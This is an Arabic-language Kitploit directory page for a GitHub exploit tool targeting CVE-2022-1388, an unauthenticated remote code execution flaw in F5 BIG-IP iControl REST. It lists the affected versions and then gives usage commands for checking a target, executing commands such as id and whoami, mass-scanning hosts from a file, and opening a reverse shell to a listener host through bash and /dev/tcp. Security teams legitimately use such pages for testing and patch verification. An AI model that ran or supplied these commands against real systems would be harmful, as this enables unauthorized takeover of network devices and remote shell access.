Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1388 — CVE-2022-1388 F5 BIG-IP iControl REST RCE | Kitploit
أدوات/GitHubGitHub/al1ex/cve-2022-1388
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubal1ex/cve-2022-1388

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE

عرض المستودع
3712منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تأثير الثغرة

قد تسمح هذه الثغرة لمهاجم غير مصادق مع وصول شبكي إلى نظام BIG-IP عبر منفذ الإدارة و/أو عناوين IP الذاتية بتنفيذ أوامر نظام عشوائية، أو إنشاء أو حذف ملفات، أو تعطيل الخدمات.

المنتج المتأثر

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

التحقق من الثغرة

الاستخدام الأساسي

root@kitploit:~
python3 CVE_2022_1388.py

استخدام

التحقق من الثغرة

root@kitploit:~
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

تحقق

تنفيذ الأمر:

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

تنفيذ_أمر

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

تنفيذ_2

المسح الجماعي

root@kitploit:~
python3 CVE_2022_1388.py -s true -f check.txt

مسح_جماعي

الشل العكسي

root@kitploit:~
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

شل_عكسي

شل_عكسي_تم

المراجع

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr

تنزيل الأداة